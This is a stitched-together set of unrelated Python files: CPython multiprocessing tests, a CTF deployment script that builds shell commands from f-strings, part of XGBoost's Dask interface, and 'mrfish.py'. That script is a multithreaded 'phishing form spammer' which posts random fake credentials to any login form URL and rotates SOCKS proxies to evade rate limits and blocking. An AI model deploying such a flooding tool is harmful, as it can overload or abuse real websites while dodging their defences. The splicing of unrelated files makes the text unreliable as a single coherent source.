def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
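# Each mixin binds the test helpers (Process, Pipe, Queue, locks, ...) to one
# flavour of the API: real processes, manager proxies, or the thread-based
# multiprocessing.dummy equivalents.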
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
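# For every test class defined here, generate one concrete unittest.TestCase per
# allowed type ('processes', 'threads', 'manager') by combining it with the
# matching mixin, and install the result into the calling module's globals.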
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
mrfish.py
|
import requests
import os
import random
import string
import json
import threading
from requests.exceptions import SSLError
from datetime import datetime
def generate_random_name():
event = random.randint(0, 4)
if event == 0:
return str(random.choice(names)).lower()
elif event in [1, 2]:
separator = ['-', '.', '_']
return str(random.choice(names)).lower() + separator[random.randint(0, len(separator) - 1)] + str(
random.choice(names)).lower()
else:
return str(random.choice(names)).lower() + random.choice(string.digits) + random.choice(string.digits)
def generate_random_password():
event = random.randint(0, 6)
if event == 0:
return ''.join(random.choice(chars) for i in range(random.randint(7, 15)))
elif event in [1, 2]:
return random.choice(dictionary) + random.choice(dictionary) + random.choice(string.digits)
elif event in [3, 4]:
return random.choice(dictionary) + random.choice(string.digits)
else:
return random.choice(string.digits) + random.choice(dictionary) + random.choice(names)
def run():
proxy = None
while True:
if use_proxy.lower() == 'y':  # normalize case to match the validation loop below
proxy = f'socks5://{random.choice(proxy_list)}'
if formDataNameLoginName.lower() == 'u':
username = generate_random_name()
if formDataNameLoginName.lower() == 'e':
username = generate_random_name() + '@' + random.choice(emails) + \
'.' + random.choice(ext)
password = generate_random_password()
try:
r = requests.post(url, headers=headers, allow_redirects=False, data={
str(formDataNameCookie): str(headers['Cookie']),
str(formDataNameContentType): str(headers['Content-Type']),
str(formDataNameLogin): username,
str(formDataNamePass): password,
}, proxies=dict(http=proxy, https=proxy))
date = datetime.today().strftime('%H:%M:%S')  # %M = minutes; %m would print the month
if r.status_code in (403, 429, 500, 502, 503, 504):
print(f'[{date}] {r.status_code} {r.reason} {r.url}')
proxy = f'socks5://{random.choice(proxy_list)}'
if r.status_code == 429:
print(f'[{date}] {username}:{password} - {r.status_code}; You are being rate limited!')
continue
print(
f'{date}> [Result: {r.status_code}] - [{formDataNameLogin}: {username}] - [{formDataNamePass}: {password}] [Proxy: {proxy}]')
except SSLError as e:
proxy = f'socks5://{random.choice(proxy_list)}'
# print('Error: URL can no longer be reached..')
except Exception as e:
proxy = f'socks5://{random.choice(proxy_list)}'
continue
# print(f'Error: {e.__class__.__name__}')
mrfish_display = """.
\033[93m /`·.¸ \033[0m
\033[93m /¸...¸`:· \033[0m \033[93mMrFish\033[0m - Discord Nitro Phishing Form Spammer w/header support
\033[93m ¸.·´ ¸ `·.¸.·´) \033[0m
\033[93m : © ):´; ¸ { \033[0m By Daan Van Essen#1337 / Amadeus
\033[93m `·.¸ `· ¸.·´\`·¸) \033[0m Modified by rens#6161
\033[93m `\\\\´´\¸.·´ \033[0m
."""
mrfish_display_list = mrfish_display.split('\n')
if __name__ == '__main__':
for i in mrfish_display_list:
print(i)  # printing directly avoids the missing space and shell-quoting issues of os.system(f'echo{i}')
url = input(' Form Request URL: ')
headers = {'Cookie': '{formDataNameCookie}', 'Content-Type': '{formDataNameContentType}'}
formDataNameLogin = input(' Form Data Username [Account/Email] Name: ')
formDataNamePass = input(' Form Data Password Name: ')
formDataNameCookie = input(' Required Cookie: ')
formDataNameContentType = input(' Content Type: ')
while True:
formDataNameLoginName = input(' Is this a username or email? [u/e]: ')
if formDataNameLoginName.lower() in ('u', 'e'):
if formDataNameLoginName.lower() == 'u':
break
if formDataNameLoginName.lower() == 'e':
break
else:
print(' That is not a valid option')
continue
while True:
threads = input(' Threads [recommend max of 32]: ')
if threads.isdigit() and 1 <= int(threads) <= 5000:
threads = int(threads)
break
else:
print(' Please enter a valid number between 1 and 5000')
continue
while True:
use_proxy = input(' Enable Proxy [Y/N]: ')
if use_proxy.lower() in ('y', 'n'):
if use_proxy.lower() == 'y':
print('Since you are using the proxy setting, you might experience slower performance and less stability, however, we do filter status requests.\n\n')
print('A kind note to the proxy setting:\nThis setting might, on some sites, seem to not be working as you have not seen any recent requests.\n\n')
break
if use_proxy.lower() == 'n':
break
else:
print(' That is not a valid option')
continue
chars = string.ascii_letters + string.digits
random.seed(os.urandom(1024))  # call seed(); assigning to random.seed would overwrite the function
names = json.loads(open('assets/names.json').read())
emails = json.loads(open('assets/emails.json').read())
ext = json.loads(open('assets/extensions.json').read())
dictionary = json.loads(open('assets/dictionary.json').read())
proxy_list = json.loads(open('assets/proxies.json').read())
for i in range(threads):
t = threading.Thread(target=run)
t.start()
|
ctfd.py
|
import os
import re
import threading
import yaml
import json
# Initialize ctfcli with the CTFD_TOKEN and CTFD_URL.
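# A minimal sketch of the environment this initializer assumes (the values are
# placeholders, not real credentials): both variables must be exported before
# the script runs, e.g. in the CI job or a local shell:
#
#   export CTFD_URL="https://ctf.example.com"
#   export CTFD_TOKEN="ctfd_xxxxxxxxxxxxxxxx"
#   python3 ctfd.py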
def init():
CTFD_TOKEN = os.getenv("CTFD_TOKEN", default=None)
CTFD_URL = os.getenv("CTFD_URL", default=None)
if not CTFD_TOKEN or not CTFD_URL:
exit(1)
os.system(f"echo '{CTFD_URL}\n{CTFD_TOKEN}\ny' | ctf init")
# Each category is in its own directory; get the names of all directories that do not begin with '.'.
def get_categories():
denylist_regex = r'\..*'
categories = [name for name in os.listdir(".") if os.path.isdir(name) and not re.match(denylist_regex, name)]
print("Categories: " + ", ".join(categories))
return categories
# Synchronize all challenges in the given category, where each challenge is in its own folder.
def sync(category):
challenges = [f"{category}/{name}" for name in os.listdir(f"./{category}") if os.path.isdir(f"{category}/{name}")]
for challenge in challenges:
if os.path.exists(f"{challenge}/challenge.yml"):
print(f"Syncing challenge: {challenge}")
os.system(f"ctf challenge sync '{challenge}'; ctf challenge install '{challenge}'")
# Change the state of certain waves of challenges
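# The expected layout of challenge-waves.yml is inferred from the loops below
# (wave -> category -> list of challenge directory names); a hypothetical
# example with made-up wave, category and challenge names:
#
#   wave1:
#     web:
#       - baby-web
#     pwn:
#       - warmup-pwn
#   wave2:
#     crypto:
#       - rsa-101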
def change_state(waves, state):
if state not in ['visible', 'hidden']:
raise Exception("state must be 'visible' or 'hidden'")
challenge_waves = open('challenge-waves.yml').read()
challenge_waves = yaml.load(challenge_waves, Loader=yaml.FullLoader)
visible = {}
hidden = {}
categories = get_categories()
for category in categories:
visible[category] = []
hidden[category] = []
for wave in challenge_waves:
if wave in waves:
for category in challenge_waves[wave]:
for challenge in challenge_waves[wave][category]:
chall = open(f'{category}/{challenge}/challenge.yml', 'r')
challenge_yml = yaml.load(chall, Loader=yaml.FullLoader)
challenge_yml['state'] = state
# Compute the slug up front so the 'hidden' branch below does not reference an
# unbound `name` (it was previously only assigned inside the 'visible' branch).
name = challenge_yml['name'].lower().replace(' ', '-')
if state == 'visible':
if 'expose' in challenge_yml:
visible[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
visible[category].append({'name': name, 'port': 0})
else:
if 'expose' in challenge_yml:
hidden[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
hidden[category].append({'name': name, 'port': 0})
chall = open(f'{category}/{challenge}/challenge.yml', 'w')
yaml.dump(challenge_yml, chall, sort_keys=False)
else:
for category in challenge_waves[wave]:
for challenge in challenge_waves[wave][category]:
chall = open(f'{category}/{challenge}/challenge.yml', 'r')
challenge_yml = yaml.load(chall, Loader=yaml.FullLoader)
challenge_yml['state'] = 'hidden'
name = challenge_yml['name'].lower().replace(' ', '-')
if 'expose' in challenge_yml:
hidden[category].append({'name': name, 'port': challenge_yml['expose'][0]['nodePort']})
else:
hidden[category].append({'name': name, 'port': 0})
return visible, hidden
# Firewall rules for visible challenges
def firewall(visible, hidden):
rules = os.popen('gcloud compute firewall-rules --format=json list').read()
for category in visible:
for challenge in visible[category]:
if challenge['port'] and challenge['name'] not in rules:
os.system(
f"""
gcloud compute firewall-rules create {challenge['name']} \
--allow tcp:{challenge['port']} \
--priority 1000 \
--target-tags challs
"""
)
print('Created firewall rules for:')
print(challenge['name'])
for category in hidden:
for challenge in hidden[category]:
if challenge['port'] and challenge['name'] in rules:
os.system(
f"""
echo -e "Y\n" | gcloud compute firewall-rules delete {challenge['name']}
"""
)
print('Deleted firewall rules for:')
print(challenge['name'])
# Synchronize each category in its own thread.
if __name__ == "__main__":
visible, hidden = change_state(['wave1', 'wave2'], 'visible')
init()
categories = get_categories()
jobs = []
for category in categories:
jobs.append(threading.Thread(target=sync, args=(category, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
print("Synchronized successfully!")
print("The following challenges are now visible:")
for category in visible:
print(f"\n{category}:")
print('- ' + '\n- '.join([challenge['name'] for challenge in visible[category]]))
firewall(visible, hidden)
print("Firewall rules updated.")
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module: one is the functional API, including
the ``train`` and ``predict`` methods; the other is the stateful Scikit-Learn wrapper
inherited from the single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_INSTALLED, CUDF_DataFrame, CUDF_Series, CUDF_concat
from .core import DMatrix, Booster, _expect
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBClassifierBase, xgboost_model_doc
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
def _start_tracker(host, n_workers):
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support():
if not DASK_INSTALLED:
raise ImportError(
'Dask needs to be installed in order to use this module')
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contributions are welcome.'
logging.warning(msg)
class RabitContext:
'''A context controlling rabit initialization and finalization.'''
def __init__(self, args):
self.args = args
def __enter__(self):
rabit.init(self.args)
logging.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args):
rabit.finalize()
logging.debug('--------------- rabit say bye ------------------')
def concat(value):
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if CUDF_INSTALLED and isinstance(value[0], (CUDF_DataFrame, CUDF_Series)):
return CUDF_concat(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client):
'''Simple wrapper around testing None.'''
ret = get_client() if client is None else client
return ret
def _get_client_workers(client):
workers = client.scheduler_info()['workers']
return workers
def _assert_client(client):
if not isinstance(client, (type(get_client()), type(None))):
raise TypeError(
_expect([type(get_client()), type(None)], type(client)))
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding references to a Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
the input data explicitly if you want to see actual computation of
constructing `DaskDMatrix`.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
data : dask.array.Array/dask.dataframe.DataFrame
data source of DMatrix.
label: dask.array.Array/dask.dataframe.DataFrame
label used for training.
missing : float, optional
Value in the input data (e.g. `numpy.ndarray`) which needs
to be present as a missing value. If None, defaults to np.nan.
weight : dask.array.Array/dask.dataframe.DataFrame
Weight for each instance.
feature_names : list, optional
Set names for features.
feature_types : list, optional
Set types for features
'''
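# Hedged construction sketch (array sizes and chunk sizes are illustrative
# assumptions): the input must be 2-dimensional and partitioned by row, so a
# dask array should be chunked with the full number of columns per block:
#
#   import dask.array as da
#   X = da.random.random((100000, 20), chunks=(10000, 20))
#   y = da.random.random(100000, chunks=10000)
#   dtrain = DaskDMatrix(client, X, y)   # forces computation of X and y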
_feature_names = None # for previous version's pickle
_feature_types = None
def __init__(self,
client,
data,
label=None,
missing=None,
weight=None,
feature_names=None,
feature_types=None):
_assert_dask_support()
_assert_client(client)
self._feature_names = feature_names
self._feature_types = feature_types
self._missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map = None
self.has_label = label is not None
self.has_weights = weight is not None
client = _xgb_get_client(client)
client.sync(self.map_local_data, client, data, label, weight)
async def map_local_data(self, client, data, label=None, weights=None):
'''Obtain references to local data.'''
def inconsistent(left, left_name, right, right_name):
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts):
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
if label is not None:
label = label.persist()
if weights is not None:
weights = weights.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
if label is not None:
y_parts = label.to_delayed()
if isinstance(y_parts, numpy.ndarray):
check_columns(y_parts)
y_parts = y_parts.flatten().tolist()
if weights is not None:
w_parts = weights.to_delayed()
if isinstance(w_parts, numpy.ndarray):
check_columns(w_parts)
w_parts = w_parts.flatten().tolist()
parts = [X_parts]
if label is not None:
assert len(X_parts) == len(
y_parts), inconsistent(X_parts, 'X', y_parts, 'labels')
parts.append(y_parts)
if weights is not None:
assert len(X_parts) == len(
w_parts), inconsistent(X_parts, 'X', w_parts, 'weights')
parts.append(w_parts)
parts = list(map(delayed, zip(*parts)))
parts = client.compute(parts)
await distributed_wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished'
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(
keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
def get_worker_parts(self, worker):
'''Get mapped parts of data in each worker.'''
list_of_parts = self.worker_map[worker.address]
assert list_of_parts, 'data in ' + worker.address + ' was moved.'
assert isinstance(list_of_parts, list)
# `get_worker_parts` is launched inside worker. In dask side
# this should be equal to `worker._get_client`.
client = get_client()
list_of_parts = client.gather(list_of_parts)
if self.has_label:
if self.has_weights:
data, labels, weights = zip(*list_of_parts)
else:
data, labels = zip(*list_of_parts)
weights = None
else:
data = [d[0] for d in list_of_parts]
labels = None
weights = None
return data, labels, weights
def get_worker_data(self, worker):
'''Get data that is local to the worker.
Parameters
----------
worker: The worker used as key to data.
Returns
-------
A DMatrix object.
'''
if worker.address not in set(self.worker_map.keys()):
msg = 'worker {address} has an empty DMatrix. ' \
'All workers associated with this DMatrix: {workers}'.format(
address=worker.address,
workers=set(self.worker_map.keys()))
logging.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=self._feature_names,
feature_types=self._feature_types)
return d
data, labels, weights = self.get_worker_parts(worker)
data = concat(data)
if self.has_label:
labels = concat(labels)
else:
labels = None
if self.has_weights:
weights = concat(weights)
else:
weights = None
dmatrix = DMatrix(data,
labels,
weight=weights,
missing=self._missing,
feature_names=self._feature_names,
feature_types=self._feature_types)
return dmatrix
def get_worker_data_shape(self, worker):
'''Get the shape of data X in each worker.'''
data, _, _ = self.get_worker_parts(worker)
shapes = [d.shape for d in data]
rows = 0
cols = 0
for shape in shapes:
rows += shape[0]
c = shape[1]
assert cols in (0, c), 'Shapes between partitions are not the' \
' same. Got: {left} and {right}'.format(left=c, right=cols)
cols = c
return (rows, cols)
def _get_rabit_args(worker_map, client):
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
host = distributed_comm.get_address_host(client.scheduler.address)
env = client.run_on_scheduler(_start_tracker, host.strip('/:'),
len(worker_map))
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def train(client, params, dtrain, *args, evals=(), **kwargs):
'''Train XGBoost model.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
\\*\\*kwargs:
Other parameters are the same as `xgboost.train` except for `evals_result`,
which is returned as part of the function's return value instead of being passed as an argument.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history.
`history` field is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
'''
_assert_dask_support()
_assert_client(client)
if 'evals_result' in kwargs.keys():
raise ValueError(
'evals_result is not supported in dask interface.',
'The evaluation history is returned as result of training.')
client = _xgb_get_client(client)
workers = list(_get_client_workers(client).keys())
rabit_args = _get_rabit_args(workers, client)
def dispatched_train(worker_addr):
'''Perform training on a single worker.'''
logging.info('Training on %s', str(worker_addr))
worker = distributed_get_worker()
with RabitContext(rabit_args):
local_dtrain = dtrain.get_worker_data(worker)
local_evals = []
if evals:
for mat, name in evals:
if mat is dtrain:
local_evals.append((local_dtrain, name))
continue
local_mat = mat.get_worker_data(worker)
local_evals.append((local_mat, name))
local_history = {}
local_param = params.copy() # just to be consistent
bst = worker_train(params=local_param,
dtrain=local_dtrain,
*args,
evals_result=local_history,
evals=local_evals,
**kwargs)
ret = {'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
futures = client.map(dispatched_train,
workers,
pure=False,
workers=workers)
results = client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def predict(client, model, data, *args):
'''Run prediction with a trained booster.
.. note::
Only default prediction mode is supported right now.
Parameters
----------
client: dask.distributed.Client
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model: A Booster or a dictionary returned by `xgboost.dask.train`.
The trained model.
data: DaskDMatrix
Input data used for prediction.
Returns
-------
prediction: dask.array.Array
'''
_assert_dask_support()
_assert_client(client)
if isinstance(model, Booster):
booster = model
elif isinstance(model, dict):
booster = model['booster']
else:
raise TypeError(_expect([Booster, dict], type(model)))
if not isinstance(data, DaskDMatrix):
raise TypeError(_expect([DaskDMatrix], type(data)))
worker_map = data.worker_map
client = _xgb_get_client(client)
rabit_args = _get_rabit_args(worker_map, client)
def dispatched_predict(worker_id):
'''Perform prediction on each worker.'''
logging.info('Predicting on %d', worker_id)
worker = distributed_get_worker()
local_x = data.get_worker_data(worker)
with RabitContext(rabit_args):
local_predictions = booster.predict(
data=local_x, validate_features=local_x.num_row() != 0, *args)
return local_predictions
futures = client.map(dispatched_predict,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
def dispatched_get_shape(worker_id):
'''Get shape of data in each worker.'''
logging.info('Trying to get data shape on %d', worker_id)
worker = distributed_get_worker()
rows, _ = data.get_worker_data_shape(worker)
return rows, 1 # default is 1
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
